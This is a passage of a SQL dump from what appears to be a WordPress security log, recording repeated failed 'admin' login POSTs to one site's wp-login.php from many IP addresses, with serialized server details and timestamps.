00:00:00'),(95403,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44014\";s:11:\"REMOTE_ADDR\";s:13:\"51.81.182.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746926515.1727231;s:12:\"REQUEST_TIME\";i:1746926515;}}','51.81.182.241',0,'2025-05-11 06:51:57','1970-01-01 00:00:00'),(95404,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50714\";s:11:\"REMOTE_ADDR\";s:15:\"170.187.185.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746926877.7889841;s:12:\"REQUEST_TIME\";i:1746926877;}}','170.187.185.171',0,'2025-05-11 06:57:59','1970-01-01 00:00:00'),(95405,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54980\";s:11:\"REMOTE_ADDR\";s:13:\"8.218.212.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746927244.739656;s:12:\"REQUEST_TIME\";i:1746927244;}}','8.218.212.177',0,'2025-05-11 07:04:06','1970-01-01 00:00:00'),(95406,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55590\";s:11:\"REMOTE_ADDR\";s:13:\"195.26.247.77\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746927610.26682;s:12:\"REQUEST_TIME\";i:1746927610;}}','195.26.247.77',0,'2025-05-11 07:10:12','1970-01-01 00:00:00'),(95407,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34330\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746927978.8935781;s:12:\"REQUEST_TIME\";i:1746927978;}}','198.54.114.18',0,'2025-05-11 07:16:20','1970-01-01 00:00:00'),(95408,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54206\";s:11:\"REMOTE_ADDR\";s:13:\"103.163.214.6\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746928341.2936561;s:12:\"REQUEST_TIME\";i:1746928341;}}','103.163.214.6',0,'2025-05-11 07:22:23','1970-01-01 00:00:00'),(95409,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47750\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746928704.0317581;s:12:\"REQUEST_TIME\";i:1746928704;}}','162.213.251.71',0,'2025-05-11 07:28:25','1970-01-01 00:00:00'),(95410,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13608\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746929074.6681831;s:12:\"REQUEST_TIME\";i:1746929074;}}','91.151.95.70',0,'2025-05-11 07:34:36','1970-01-01 00:00:00'),(95411,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42938\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746929444.743818;s:12:\"REQUEST_TIME\";i:1746929444;}}','103.191.76.181',0,'2025-05-11 07:40:46','1970-01-01 00:00:00'),(95412,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41964\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.146.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746929817.8734169;s:12:\"REQUEST_TIME\";i:1746929817;}}','66.29.146.59',0,'2025-05-11 07:46:59','1970-01-01 00:00:00'),(95413,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32892\";s:11:\"REMOTE_ADDR\";s:13:\"183.82.35.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s